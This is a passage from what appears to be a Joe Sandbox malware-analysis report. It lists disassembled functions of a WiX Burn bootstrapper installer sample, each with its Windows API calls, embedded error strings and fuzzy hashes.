                                                              • Part of subcall function 00D056A9: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00D06595,00D06595,?,00D0563D,?,?,00000000), ref: 00D056E5
                                                              • Part of subcall function 00D056A9: GetLastError.KERNEL32(?,00D0563D,?,?,00000000,?,?,00D06595,?,00D07F02,?,?,?,?,?), ref: 00D05714
                                                            • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,00D082B9), ref: 00D06F59
                                                            Strings
                                                            • Failed to find variable value '%ls'., xrefs: 00D06DE3
                                                            • variable.cpp, xrefs: 00D06E4B
                                                            • Setting string variable '%ls' to value '%ls', xrefs: 00D06EED
                                                            • Setting hidden variable '%ls', xrefs: 00D06E86
                                                            • Setting numeric variable '%ls' to value %lld, xrefs: 00D06EFA
                                                            • Failed to insert variable '%ls'., xrefs: 00D06E0D
                                                            • Attempt to set built-in variable value: %ls, xrefs: 00D06E56
                                                            • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00D06ED0
                                                            • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00D06F6B
                                                            • Failed to set value of variable: %ls, xrefs: 00D06F41
                                                            • Unsetting variable '%ls', xrefs: 00D06F15
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                            • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                            • API String ID: 2716280545-445000439
                                                            • Opcode ID: 5bf276bf4153575014ec1e6b96177a2a6b566a89c16c9468b31654ec56c3b349
                                                            • Instruction ID: e2dd732fe064aa19294e940e7bdfad2776c5d7d94ce21a1df3b8eca697060b5e
                                                            • Opcode Fuzzy Hash: 5bf276bf4153575014ec1e6b96177a2a6b566a89c16c9468b31654ec56c3b349
                                                            • Instruction Fuzzy Hash: 1B51E171A40226ABDB309F29DC8AF6B3FA8EF55714F144019F84C6A2C2C275D860CAB1
                                                            Function 00D04AE5 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 144windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindow.USER32(?), ref: 00D04C64
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00D04C75
                                                            Strings
                                                            • Failed while running , xrefs: 00D04C2A
                                                            • Failed to open log., xrefs: 00D04B18
                                                            • Failed to set layout directory variable to value provided from command-line., xrefs: 00D04C06
                                                            • Failed to create the message window., xrefs: 00D04B98
                                                            • WixBundleLayoutDirectory, xrefs: 00D04BF5
                                                            • Failed to check global conditions, xrefs: 00D04B49
                                                            • Failed to set registration variables., xrefs: 00D04BDE
                                                            • Failed to set action variables., xrefs: 00D04BC4
                                                            • Failed to query registration., xrefs: 00D04BAE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: MessagePostWindow
                                                            • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                            • API String ID: 3618638489-3051724725
                                                            • Opcode ID: 98be97307519f7deae03366ddc7843fd905eaea7028f3ac5ca9687c392abd80e
                                                            • Instruction ID: 632dcc4cb20e6fea653c55ec1d92980df9c98ee42bfbc141fd13e4fc2a68b50c
                                                            • Opcode Fuzzy Hash: 98be97307519f7deae03366ddc7843fd905eaea7028f3ac5ca9687c392abd80e
                                                            • Instruction Fuzzy Hash: DE4108B1A0161ABFDB265A70CD45FBAB66CFF00760F044216FA09A61D0DBB0EC5497F4
                                                            Function 6E23E387 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 99libraryloadersleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1727976170.000000006E231000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E230000, based on PE: true
                                                            • Associated: 00000001.00000002.1727956784.000000006E230000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728011794.000000006E252000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728100953.000000006E265000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728119315.000000006E267000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000001.00000002.1728162647.000000006E26B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6e230000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressModuleProcProcess$AllocCreateExitFileHandleLocalNameObjectSingleSleepWait
                                                            • String ID: D$\
                                                            • API String ID: 2086907916-468123767
                                                            • Opcode ID: e6b0d5e5df04b4c669bc546e22e3414ee82adeb29160eb38878878d683b9f2e0
                                                            • Instruction ID: f6b2e1f17b7bc4a41cfdc51b5da142bb2ddf1a008f5458e4e1d7906867984596
                                                            • Opcode Fuzzy Hash: e6b0d5e5df04b4c669bc546e22e3414ee82adeb29160eb38878878d683b9f2e0
                                                            • Instruction Fuzzy Hash: A94119F18197118FD750AF68D68832EBBF1FF95304F00891DE98887294E7B99458CB92
                                                            Function 00D1EA7D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00D0548E,?,?), ref: 00D1EA9D
                                                            • GetLastError.KERNEL32(?,00D0548E,?,?), ref: 00D1EAAA
                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_0001E7B4,?,00000000,00000000), ref: 00D1EB03
                                                            • GetLastError.KERNEL32(?,00D0548E,?,?), ref: 00D1EB10
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00D0548E,?,?), ref: 00D1EB4B
                                                            • CloseHandle.KERNEL32(00000000,?,00D0548E,?,?), ref: 00D1EB6A
                                                            • CloseHandle.KERNELBASE(?,?,00D0548E,?,?), ref: 00D1EB77
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                            • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                            • API String ID: 2351989216-3599963359
                                                            • Opcode ID: c7cf015684ecbdb8fef1544d54c6eb2bd723ec11f3037dba2e565715e537619b
                                                            • Instruction ID: 5a67db2e153f4beee3de9867690b60cfbe4597c28377d82a1df62e0ce9fd32a1
                                                            • Opcode Fuzzy Hash: c7cf015684ecbdb8fef1544d54c6eb2bd723ec11f3037dba2e565715e537619b
                                                            • Instruction Fuzzy Hash: DF318176D01229BBDB10DFA99D85ADEFBB8FF04761F110166BD05F7280E6709E4086B0
                                                            Function 00D214E1 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,00D05405,00D053BD,00000000,00D05445), ref: 00D21506
                                                            • GetLastError.KERNEL32 ref: 00D21519
                                                            • GetExitCodeThread.KERNELBASE(00D4B488,?), ref: 00D2155B
                                                            • GetLastError.KERNEL32 ref: 00D21569
                                                            • ResetEvent.KERNEL32(00D4B460), ref: 00D215A4
                                                            • GetLastError.KERNEL32 ref: 00D215AE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                            • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                            • API String ID: 2979751695-3400260300
                                                            • Opcode ID: acf193c93aba1bd4b71c1ef138ba30ec367a5a2aef850c0ebf150402fa655291
                                                            • Instruction ID: 50f1d60682d0ac977bc90d93d4614abefec59ac03a9c658f570dda26b2e2b6f9
                                                            • Opcode Fuzzy Hash: acf193c93aba1bd4b71c1ef138ba30ec367a5a2aef850c0ebf150402fa655291
                                                            • Instruction Fuzzy Hash: 0F31D478A00325AFDB10DF699D05AAF7BF8EF65311B10819AFD06D62A0E770CA009B71
                                                            Function 00D02DBF Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 203sleepfiletimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00D02E5F
                                                            • GetLastError.KERNEL32 ref: 00D02E69
                                                            • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00D02F09
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00D02F96
                                                            • GetLastError.KERNEL32 ref: 00D02FA3
                                                            • Sleep.KERNEL32(00000064), ref: 00D02FB7
                                                            • CloseHandle.KERNEL32(?), ref: 00D0301F
                                                            Strings
                                                            • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00D02F66
                                                            • pathutil.cpp, xrefs: 00D02E8D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                            • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                            • API String ID: 3480017824-1101990113
                                                            • Opcode ID: 52e4f8ad6b4ec7a46a8f0b911449ce15d2ec81e212f9372b3d6124e60e881beb
                                                            • Instruction ID: a102e18e1d6ceaca75f1550cb5bbb73eb402c7ac54dc9be9a5977e0a3974532c
                                                            • Opcode Fuzzy Hash: 52e4f8ad6b4ec7a46a8f0b911449ce15d2ec81e212f9372b3d6124e60e881beb
                                                            • Instruction Fuzzy Hash: B5716476D42229ABDB309F59DC4DBAAB7B8AF18720F140195F908E72D0D7749E808F70
                                                            Function 00D0CBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,00D053BD,00000000,00D05489,00D05445,WixBundleUILevel,840F01E8,?,00000001), ref: 00D0CC1C
                                                            Strings
                                                            • Failed to get directory portion of local file path, xrefs: 00D0CCF5
                                                            • Failed to find embedded payload: %ls, xrefs: 00D0CC48
                                                            • Failed to ensure directory exists, xrefs: 00D0CCEE
                                                            • Failed to extract file., xrefs: 00D0CCE7
                                                            • Failed to concat file paths., xrefs: 00D0CCFC
                                                            • Payload was not found in container: %ls, xrefs: 00D0CD29
                                                            • Failed to get next stream., xrefs: 00D0CD03
                                                            • payload.cpp, xrefs: 00D0CD1D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                            • API String ID: 1825529933-1711239286
                                                            • Opcode ID: 527256dafd045768b99aaeaa0e06b53459e573a1f2fb0282acbf42f1ab7f3a04
                                                            • Instruction ID: c657b6fb4dbc042e4a395a7c4201a3e6f7286582b678f6d2e7e03dc36cee2d6a
                                                            • Opcode Fuzzy Hash: 527256dafd045768b99aaeaa0e06b53459e573a1f2fb0282acbf42f1ab7f3a04
                                                            • Instruction Fuzzy Hash: 1641BE31910219AFCF259F89CC81BAEBBA5FF00710B159279E94DAB2E1D7709D40DBB4
                                                            Function 00D04796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 00D047BB
                                                            • GetCurrentThreadId.KERNEL32 ref: 00D047C1
                                                            • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D0484F
                                                            Strings
                                                            • engine.cpp, xrefs: 00D0489B
                                                            • Unexpected return value from message pump., xrefs: 00D048A5
                                                            • Failed to start bootstrapper application., xrefs: 00D0481D
                                                            • Failed to load UX., xrefs: 00D04804
                                                            • wininet.dll, xrefs: 00D047EE
                                                            • Failed to create engine for UX., xrefs: 00D047DB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Message$CurrentPeekThread
                                                            • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                            • API String ID: 673430819-2573580774
                                                            • Opcode ID: 26dcd517812c13ecd81913a649b43438d47b56710605956c341f0c900031bdff
                                                            • Instruction ID: f4775486aaaf992edaf4397fc7aa9323d6ae74986dbad9bddf94a2c810360504
                                                            • Opcode Fuzzy Hash: 26dcd517812c13ecd81913a649b43438d47b56710605956c341f0c900031bdff
                                                            • Instruction Fuzzy Hash: FF417FB1A00655BFDB149AA4DC85FBA77ACEF05324F104526FA08E6290DB71ED4587B0
                                                            Function 00D0D6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,00D047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00D0548E,?), ref: 00D0D6DA
                                                            • GetLastError.KERNEL32(?,00D047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00D0548E,?,?), ref: 00D0D6E7
                                                            • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 00D0D71F
                                                            • GetLastError.KERNEL32(?,00D047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00D0548E,?,?), ref: 00D0D72B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$AddressLibraryLoadProc
                                                            • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                            • API String ID: 1866314245-2276003667
                                                            • Opcode ID: 5c481c696cc46b87a986f6c3a66e619c948db1a366adb4bb456de60e683728e6
                                                            • Instruction ID: 8ddc557622fbbf5bba95c8486c4d6c422690337406f9e5722200642eb3691b9c
                                                            • Opcode Fuzzy Hash: 5c481c696cc46b87a986f6c3a66e619c948db1a366adb4bb456de60e683728e6
                                                            • Instruction Fuzzy Hash: 3B11C43BA80732ABCB315BD55C05F1B7A95AF05B61F014527BE59EB2D0DB60DC088AF4
                                                            Function 00D49A4B Relevance: 15.2, APIs: 10, Instructions: 158libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00D49AA6
                                                            • GetLastError.KERNEL32 ref: 00D49AB2
                                                            • DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D49AE1
                                                            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00D49AF2
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00D49B0C
                                                            • GetProcAddress.KERNEL32(?,?), ref: 00D49B74
                                                            • GetLastError.KERNEL32(?,?), ref: 00D49B80
                                                            • DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D49BAF
                                                            • RaiseException.KERNEL32(C06D007F,00000000,00000001,?,?,?), ref: 00D49BC0
                                                            • DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D49BF7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadReleaseSectionWrite$ErrorExceptionLastLibraryRaise$AddressFreeLoadProc
                                                            • String ID:
                                                            • API String ID: 202095176-0
                                                            • Opcode ID: 928ab591af2880ff58d7c5f4c6c99a072ace062f2a87e76da113a1c17177b54f
                                                            • Instruction ID: c90f29a0238f908dc9bfca618f75cc629fbbe2704ffa004d6ac71e7a3ace418b
                                                            • Opcode Fuzzy Hash: 928ab591af2880ff58d7c5f4c6c99a072ace062f2a87e76da113a1c17177b54f
                                                            • Instruction Fuzzy Hash: 32513C35A006199FDB11DFA6E8E5AAEB7B5EB58361B09016AE901E7350DB70DD00CAB0
                                                            Function 00D0F812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00D0F942
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00D0F94F
                                                            Strings
                                                            • Failed to open registration key., xrefs: 00D0F8AB
                                                            • Failed to format pending restart registry key to read., xrefs: 00D0F846
                                                            • Failed to read Resume value., xrefs: 00D0F8D8
                                                            • %ls.RebootRequired, xrefs: 00D0F82F
                                                            • Resume, xrefs: 00D0F8B6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                            • API String ID: 3535843008-3890505273
                                                            • Opcode ID: f68e7c1c8c137e30cdfedfa2df5108abb4a26e71e0c2f3e940bd0015192cd81c
                                                            • Instruction ID: 6b901092bb3b1135ee710cb897d706815707a2eb82c0dc49eed4f47f62d6f48a
                                                            • Opcode Fuzzy Hash: f68e7c1c8c137e30cdfedfa2df5108abb4a26e71e0c2f3e940bd0015192cd81c
                                                            • Instruction Fuzzy Hash: 1D412B75900219FFCF21DF98D881BADBBB4FB04310F258176E958AB690C371AE459F60
                                                            Function 00D40523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00D6B5FC,00000000,?,?,?,00D14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00D054FA,?), ref: 00D40533
                                                            • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,00D6B5F4,?,00D14207,00000000,Setup), ref: 00D405D7
                                                            • GetLastError.KERNEL32(?,00D14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00D054FA,?,?,?), ref: 00D405E7
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00D14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00D054FA,?), ref: 00D40621
                                                              • Part of subcall function 00D02DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00D02F09
                                                            • LeaveCriticalSection.KERNEL32(00D6B5FC,?,?,00D6B5F4,?,00D14207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,00D054FA,?), ref: 00D4067A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                            • String ID: logutil.cpp
                                                            • API String ID: 4111229724-3545173039
                                                            • Opcode ID: dd6c21cf8d5bfccb7008f15b3f8b6a3f347a334a7396b9dfd4760b45c0760245
                                                            • Instruction ID: 66a094a5ee1bd41129ed96d6e16389a2f05c19a1fe3f109d4ba5900b7f40f593
                                                            • Opcode Fuzzy Hash: dd6c21cf8d5bfccb7008f15b3f8b6a3f347a334a7396b9dfd4760b45c0760245
                                                            • Instruction Fuzzy Hash: D3319331901329FFDB11AF659D45EAA7E6DEB00764F060126FA02E72A0D7B1CD609FB0
                                                            Function 00D432F3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00D43309
                                                            • SysAllocString.OLEAUT32(?), ref: 00D43325
                                                            • VariantClear.OLEAUT32(?), ref: 00D433AC
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00D433B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: StringVariant$AllocClearFreeInit
                                                            • String ID: `<u$xmlutil.cpp
                                                            • API String ID: 760788290-3482516102
                                                            • Opcode ID: 406f5eb0d2406f04b948617a252736c365d0564eb26bc428ee7f949de03d9755
                                                            • Instruction ID: 07f34bd17d9a1374bdba829a18af1ad9e4f84fd9cadde4a99be07d98a845fd81
                                                            • Opcode Fuzzy Hash: 406f5eb0d2406f04b948617a252736c365d0564eb26bc428ee7f949de03d9755
                                                            • Instruction Fuzzy Hash: DE216035901219AFCB21DFA9C84CEAEBBB9AF45721F154158F905AB220DB31DE018BB0
                                                            Function 00D20B8E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • Unexpected call to CabWrite()., xrefs: 00D20BC1
